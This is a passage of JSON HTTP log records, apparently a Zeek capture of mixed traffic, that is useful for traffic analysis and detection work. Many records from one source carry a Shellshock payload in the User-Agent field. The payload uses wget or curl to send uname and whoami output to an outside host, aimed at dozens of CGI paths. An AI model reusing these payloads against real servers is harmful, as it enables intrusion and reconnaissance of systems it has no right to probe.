028vA","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","version":"1.1","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":341,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FA28Kr3SuZs9VhdK08"],"resp_mime_types":["text/plain"]} +{"ts":"2018-08-03T23:39:01.096578Z","uid":"CScpaf3kDEsPg0jN9i","id.orig_h":"192.168.0.51","id.orig_p":45480,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":2,"version":"1.1","request_body_len":0,"response_body_len":2040,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FEf921GrNht7dpKcf"],"resp_mime_types":["image/jpeg"]} +{"ts":"2018-08-03T23:39:01.162290Z","uid":"CeYsLp2aLvcZORoUz2","id.orig_h":"192.168.0.54","id.orig_p":53114,"id.resp_h":"37.252.163.102","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ib.adnxs.com","uri":"/ttj?ttjb=1\u0026bdc=1428917487\u0026bdh=m2UeWJC3AoT7yexCPqkPR4WOUSE.\u0026bdref=https://apps.skype.com/chatadwidget/?containerType=NR\u0026bdtop=true\u0026bdifs=2\u0026bstk=https://apps.skype.com/chatadwidget/?containerType=NR,https://static.skypeassets.com/adserver/AdLoader.html?version=1.66.4#pgqp:%26SKID%3Dfdc256726fe284b6b490bfa128de6f14%26PG%3DSKYSESV5%26AP%3D2370%26GENDER%3DM%26CAGE%3D39%26sklang%3Den%26SKYEXP%3D1;wt:728;ht:90;tkn:35710;divid:bigNorthAd,https://static.skypeassets.com/adserver/AdLoader.html?version=1.66.4\u0026is_premium=0\u0026member=280\u0026inv_code=SKYSESV5\u0026imp_id=0d40c636d8bf443f9a9fafd0ca33dcd2\u0026cb=1914390860\u0026reserve_encr=0006022worwEBpwYfPFuDpVD1u7PQTvHbGV8e67cXmcnaCZh0Ow\u0026referrer=http://Skype.com\u0026size=728x90\u0026providerid=","version":"1.1","user_agent":"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)","request_body_len":0,"response_body_len":3445,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FTCNps2TqpEplRrzX7"],"resp_mime_types":["application/javascript"]} +{"ts":"2018-08-03T23:39:01.162290Z","uid":"CeYsLp2aLvcZORoUz2","id.orig_h":"192.168.0.54","id.orig_p":53114,"id.resp_h":"37.252.163.102","id.resp_p":80,"trans_depth":2,"method":"GET","host":"ib.adnxs.com","uri":"/seg?add=2600186:0\u0026t=2","version":"1.1","user_agent":"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)","request_body_len":0,"response_body_len":43,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FLjRzX2KUj9EyUac7"],"resp_mime_types":["image/gif"]} +{"ts":"2018-08-03T23:39:01.162290Z","uid":"C89BVH2ULg6lxYGuk9","id.orig_h":"192.168.0.54","id.orig_p":53183,"id.resp_h":"23.43.139.27","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ss.symcd.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEEEb4AYyvmIFtkaXahi9P3I=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":1609,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["Fj0QIJ1dbhs8JXCGTl"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:38:56.206022Z","uid":"CunqCs2VofincaO988","id.orig_h":"146.52.78.242","id.orig_p":3574,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/snorkerz.batHTTP/1.0","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.206022Z","uid":"CHCDaDbTzDvoO2YEc","id.orig_h":"146.52.78.242","id.orig_p":4492,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/mmstdod.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.206240Z","uid":"CVZg2l1jUJ7L64gPx1","id.orig_h":"146.52.78.242","id.orig_p":2045,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/webspirs.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.153007Z","uid":"C5scOO2z46lzbTdfNl","id.orig_h":"192.168.0.54","id.orig_p":53134,"id.resp_h":"80.239.217.179","id.resp_p":80,"trans_depth":1,"method":"GET","host":"vassg141.ocsp.omniroot.com","uri":"/MFUwUzBRME8wTTAJBgUrDgMCGgUABBS856ddZAq5lE7vDJmoUDW1u98SMAQU3WyAfLq1MhelhEFA8NIEZhMvqZACFENx1ZUhBjMNJSFn+9NBJ1muHgjh","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":1770,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FMhrTdjhgEn8HSxhj"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:39:01.153007Z","uid":"CIIwqvuq5RCV1nf1a","id.orig_h":"192.168.0.54","id.orig_p":53144,"id.resp_h":"69.172.216.56","id.resp_p":80,"trans_depth":1,"method":"GET","host":"fw.adsafeprotected.com","uri":"/rfw/dc/35853/4118853/adj/N5249.285985.MEDIAIQ/B8555132.115558614;sz=728x90;click=http://ams1.ib.adnxs.com/click?m9r1oVPF1z-b2vWhU8XXP3E9Ctej8BZAXxOhTknn2j9fE6FOSefaPx95VlPwSpgmQWLQvfCzBXvvjCtVAAAAAO5pHgAYAQAAnAIAAAIAAAAbDYUBF8kDAAAAAQBVU0QAU0VLANgCWgAaaAAAzu0AAgUAAQIAAIwAXCjtaQAAAAA./cnd=!UwX6MgiPitkDEJualAwYl5IPIAA./referrer=skype.com/clickenc=;ord=1428917487?adsafe_preview=0\u0026adsafe_url=https://apps.skype.com/chatadwidget/?containerType=NR\u0026adsafe_type=c\u0026adsafe_url=https://static.skypeassets.com/adserver/AdLoader.html?version=1.66.4\u0026adsafe_type=d\u0026adsafe_url=https://static.skypeassets.com/adserver/AdLoader.html?version=1.66.4#pgqp:%26SKID%3Dfdc256726fe284b6b490bfa128de6f14%26PG%3DSKYSESV5%26AP%3D2370%26GENDER%3DM%26CAGE%3D39%26sklang%3Den%26SKYEXP%3D1;wt:728;ht:90;tkn:35710;divid:bigNorthAd\u0026adsafe_type=b\u0026adsafe_jsinfo=,c:9EYAiL,sl:na,em:true,fr:false,pt:1-5-15,br:i,fv:0,bv:10,dm:10,abv:11,an:m,id:dc32b0ad-e1bf-11e4-9a6c-002590882e9e,fm:p9J69RZ+111*.35853-4118853,ex:e10,pl:,rpx:0,bl:0,fc:0,rt:0,cb:0,np:0,th:0,uf:1,tt:jss,et:38,uid:126f2701a1c7b7943e14bfa5c78f21,v:9.1,sp:0,ct:na,dtm:i,mn:app13ami,gtpl:0,wr:977.618,sr:1920.1080,mf:2026359474,ov:0","version":"1.1","user_agent":"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)","request_body_len":0,"response_body_len":0,"status_code":302,"status_msg":"Moved Temporarily","tags":[]} +{"ts":"2018-08-03T23:39:01.153007Z","uid":"CqPHCK2V81Tj3Fvlae","id.orig_h":"192.168.0.54","id.orig_p":53116,"id.resp_h":"62.210.86.88","id.resp_p":80,"trans_depth":1,"method":"GET","host":"pixel.alephd.com","uri":"/post_msft?LgDc=\u0026L4DK=374709\u0026rZzC=skype.com\u0026aNVl=292\u0026ZzpC=\u0026Dsph=\u0026Hsyz=\u00260ZGY=25496859\u0026Xyes=\u0026iK5S=\u0026b6lE=0.3714\u0026-tgi=-1\u0026wziz=5.735\u0026vKcZ=2781055165952063775\u00262jSB=0.420367\u0026-Zu8=\u0026e9iH=8864689288106762817\u0026b5ho=unaudited\u0026GAa8=1993198\u0026DH5k=0.0.0.0\u00268rSZ=\u0026-Z06=0.371419","version":"1.1","user_agent":"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)","request_body_len":0,"response_body_len":73,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FOyUUQ3O7mwYP1oj62"],"resp_mime_types":["application/javascript"]} +{"ts":"2018-08-03T23:39:01.153007Z","uid":"C5scOO2z46lzbTdfNl","id.orig_h":"192.168.0.54","id.orig_p":53134,"id.resp_h":"80.239.217.179","id.resp_p":80,"trans_depth":2,"method":"GET","host":"vassg141.ocsp.omniroot.com","uri":"/MFUwUzBRME8wTTAJBgUrDgMCGgUABBS856ddZAq5lE7vDJmoUDW1u98SMAQU3WyAfLq1MhelhEFA8NIEZhMvqZACFAwImusHffS3E38Qma6E91XbSd4k","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":1770,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FXGXfk2udSuCNosOw5"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:39:01.168244Z","uid":"C0LcyC4JExO1DggLW","id.orig_h":"192.168.0.54","id.orig_p":53188,"id.resp_h":"188.121.36.239","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.godaddy.com","uri":"//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwQLre+Wcn4=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":1786,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F6PRUaDxiT8jJgjtk"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:39:01.168244Z","uid":"Cwsong261PN5q7OhW5","id.orig_h":"192.168.0.53","id.orig_p":3682,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"UNSUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","version":"1.1","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"status_code":200,"status_msg":"OK","tags":[]} +{"ts":"2018-08-03T23:39:01.168244Z","uid":"CkbyH62jwxViOw5VN2","id.orig_h":"192.168.0.53","id.orig_p":3683,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"UNSUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","version":"1.1","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"status_code":200,"status_msg":"OK","tags":[]} +{"ts":"2018-08-03T23:38:56.197802Z","uid":"CvIVy43ZwTfwBGdeb5","id.orig_h":"146.52.78.242","id.orig_p":4573,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-sys/addalink.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.213006Z","uid":"CqtmGD0du6QvDQcmd","id.orig_h":"146.52.78.242","id.orig_p":4180,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/if/admin/nph-build.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.213006Z","uid":"Cn6ZFsZVVRQUxgNi6","id.orig_h":"146.52.78.242","id.orig_p":1190,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/hitview.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.223140Z","uid":"CsXKrbbruF48u18yf","id.orig_h":"146.52.78.242","id.orig_p":4404,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/ratlog.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.165044Z","uid":"CP6VIg24xTNeW6g7jk","id.orig_h":"192.168.0.54","id.orig_p":53182,"id.resp_h":"23.43.139.27","id.resp_p":80,"trans_depth":1,"method":"GET","host":"rapidssl-ocsp.geotrust.com","uri":"/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSDT3x16sZUL+1Ysr0rFYAoZTAeDgQUa2k9ahhCSt2PAmU5/TUkhniRFjACAxKKJw==","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":1347,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FdNwuQ1NSCfu4gopk9"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:38:56.203241Z","uid":"CzgbQV2uZp3wnEXB54","id.orig_h":"146.52.78.242","id.orig_p":1931,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/whois.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.168537Z","uid":"CuFwZ43GpcVz4JQFg3","id.orig_h":"192.168.0.54","id.orig_p":53136,"id.resp_h":"23.43.139.27","id.resp_p":80,"trans_depth":2,"method":"GET","host":"ocsp.geotrust.com","uri":"/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI20Q==","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":1363,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FqYdAB4I6oT4ayosei"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:39:01.168537Z","uid":"CwGpye3ioq45bKe5o","id.orig_h":"192.168.0.54","id.orig_p":53122,"id.resp_h":"37.252.163.153","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ams1.ib.adnxs.com","uri":"/vevent?e=wqT_3QKnBPQmAh4CAAACANYABQjvma6pBRCf8tmahd6SzCYYwcTB7ov-7IJ7IAEqLQmb2vWhU8XXPxGb2vWhU8XXPxlxPQrXo_AWQCFfE6FOSefaPylfE6FOSefaPzDu03k4mAJAnAVIAlCbmpQMWJeSD2AAaJrQAXAAeM7bA4ABAYoBA1VTRJIBA1NFS5gB2AWgAVqoAQCwAQC4AQLAAQXIAQDQAQDYAQDgAQDwAQD6AQhTS1lTRVNWNYoCOnVmKCdhJywgMjI4MzMzLCAxNDI4OTE3NDg3KTt1ZigncicsIDI1NDk2ODU5LCAxNDI4OTE3NDg3KTuSAq0BIUt5cEI4Z2lQaXRrREVKdWFsQXdZQUNDWGtnOHdBRGdBUUFCSW5BVlE3dE41V0FCZ3NRWm9BSEFBZUFDQUFRU0lBWlMzQlpBQkFaZ0JBYUFCQWFnQkE3QUJBTGtCM1ZkRDBYVmowal9CQVY4VG9VNUo1OW9feVFIUER4ZDA4VVRxUDlrQnJCeGFaRHZmNVRfZ0FlYkZDLW9CQnpJMU56QTRPVEgxQVFBQUFBQS6aAh0hVXdYNk1naVBpdGtERUp1YWxBd1lsNUlQSUFBLtgCrAbgArWcH-oCCXNreXBlLmNvbfICEAoGQURWX0lEEgYyMjgzMzPyAhAKBUNQX0lEEgc3NzUwOTI3gAMAiAMBkAMAmAMAoAMBqgMAsAMAuAMAwAOsAsgDANgD86ck4AMA6AMA8AMA\u0026dlo=1\u0026referrer=skype.com\u0026type=pv\u0026px=837\u0026py=260\u0026bw=728\u0026bh=90\u0026sw=1920\u0026sh=1080\u0026pw=728\u0026ph=95\u0026ww=728\u0026wh=90\u0026x=1428917489627189243,159999,v,win,iespec_ie10,view5-1,90,,3","version":"1.1","user_agent":"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)","request_body_len":0,"response_body_len":0,"status_code":200,"status_msg":"OK","tags":[]} +{"ts":"2018-08-03T23:38:56.216902Z","uid":"CTe3ki1gTIUneW7XP7","id.orig_h":"146.52.78.242","id.orig_p":4291,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/cartmanager.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.232060Z","uid":"CJK8ac6cDJ4z8V8Nf","id.orig_h":"146.52.78.242","id.orig_p":4932,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/store/index.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.232060Z","uid":"CRz33W2azri5HlXxFl","id.orig_h":"146.52.78.242","id.orig_p":3121,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/if/admin/nph-build.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.166833Z","uid":"Cbjhuh1tN9muZ4SV9e","id.orig_h":"192.168.0.54","id.orig_p":62247,"id.resp_h":"198.199.14.136","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/update?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=\u0026retry_count=0\u0026retry_version=\u0026sc=1\u0026scfr=\u0026avs=0,0,0,0,0,0,0,0,0,0,0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.202299Z","uid":"CYVCNq2Q6UHJyH4Mw2","id.orig_h":"146.52.78.242","id.orig_p":4313,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/pollssi.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.202299Z","uid":"CVm08644atW5CRBr1e","id.orig_h":"146.52.78.242","id.orig_p":2774,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/log-reader.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.217521Z","uid":"CAAA6e4u5KepYklte5","id.orig_h":"146.52.78.242","id.orig_p":4958,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/admin.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.227677Z","uid":"CFxH0G45dlzjq8R0Y1","id.orig_h":"146.52.78.242","id.orig_p":2843,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/shop.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.150772Z","uid":"Cg7z7o3VLiMEpfEZEi","id.orig_h":"192.168.0.54","id.orig_p":53142,"id.resp_h":"178.255.83.1","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.netsolssl.com","uri":"/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQ87g7aoa+rYOYMiDfB7zjdMD55cAQUPEHijwgIqUwliY1txTjQ/IWMYhcCEQCIu6X/ESq8HWYKD4AUXdBp","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":472,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FTs01s4PEb8dsxZGc"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:39:01.166082Z","uid":"C1KVyTJHFeecUigGe","id.orig_h":"192.168.0.54","id.orig_p":53163,"id.resp_h":"178.255.83.1","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.usertrust.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":471,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F8vQSP20abHDDKKU4l"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:39:01.166082Z","uid":"CsIugcEHUM5fQ2Cb4","id.orig_h":"192.168.0.54","id.orig_p":53178,"id.resp_h":"23.43.139.27","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.verisign.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEG7MeqWnAyAJuM689OlS1JE=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":1762,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FHgRoT3Q3w3wyK0Ys4"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:38:56.211410Z","uid":"Csbm0bdfyv4oqTkDd","id.orig_h":"146.52.78.242","id.orig_p":2291,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/nph-exploitscanget.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.211410Z","uid":"CuzwQD115sos6GKflc","id.orig_h":"146.52.78.242","id.orig_p":2444,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/common/listrec.plHTTP/1.0","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.226589Z","uid":"CMceTIJrI7UdrMPo7","id.orig_h":"146.52.78.242","id.orig_p":1861,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/snorkerz.batHTTP/1.0","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.226589Z","uid":"CgYzka2SoJ8Zl9axf4","id.orig_h":"146.52.78.242","id.orig_p":2334,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/jammail.plHTTP/1.0","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.236697Z","uid":"CtYE5M3NVaW127s8U3","id.orig_h":"146.52.78.242","id.orig_p":4099,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/admin.plHTTP/1.0","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.166295Z","uid":"CRzAsc29JSnxelQvO8","id.orig_h":"192.168.0.54","id.orig_p":53150,"id.resp_h":"213.155.151.154","id.resp_p":80,"trans_depth":2,"method":"GET","host":"clients1.google.com","uri":"/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCAtqoTEy9TjI","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":463,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FaBSDC4FbQEejYfWOf"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:39:01.166295Z","uid":"CE8Kp32RW9a6SP1Qa7","id.orig_h":"192.168.0.54","id.orig_p":53180,"id.resp_h":"23.43.139.27","id.resp_p":80,"trans_depth":1,"method":"GET","host":"s2.symcb.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":1762,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["Flohgfb2gUzpZOyv4"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:38:56.210211Z","uid":"C6av771PQ1xqLrSNp1","id.orig_h":"146.52.78.242","id.orig_p":4701,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-mod/index.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.210211Z","uid":"Cw2HA3QMlupOayfhe","id.orig_h":"146.52.78.242","id.orig_p":3416,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/snorkerz.cmdHTTP/1.0","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.235524Z","uid":"C4kpx34zuUJhv2rL7f","id.orig_h":"146.52.78.242","id.orig_p":1283,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/lookwho.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.164535Z","uid":"CihU8r1Kgy9oDV9wkc","id.orig_h":"192.168.0.54","id.orig_p":53181,"id.resp_h":"93.184.220.29","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.digicert.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTtSK3dy3sA4g6EKqm0CfGsMDTPlgQUUOpzidsp+xCPnuUBINTeeZlIg/cCEAUrS5AHQf/JoVwhLSfIhlY=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":471,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FgpriO1Spwt02sb6R9"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:39:01.164535Z","uid":"CihU8r1Kgy9oDV9wkc","id.orig_h":"192.168.0.54","id.orig_p":53181,"id.resp_h":"93.184.220.29","id.resp_p":80,"trans_depth":2,"method":"GET","host":"ocsp.digicert.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAhR+VmBQUXKveAk4hLJwg4=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":471,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FMcEmi2mOOyodYDBk7"],"resp_mime_types":["application/ocsp-response"]} 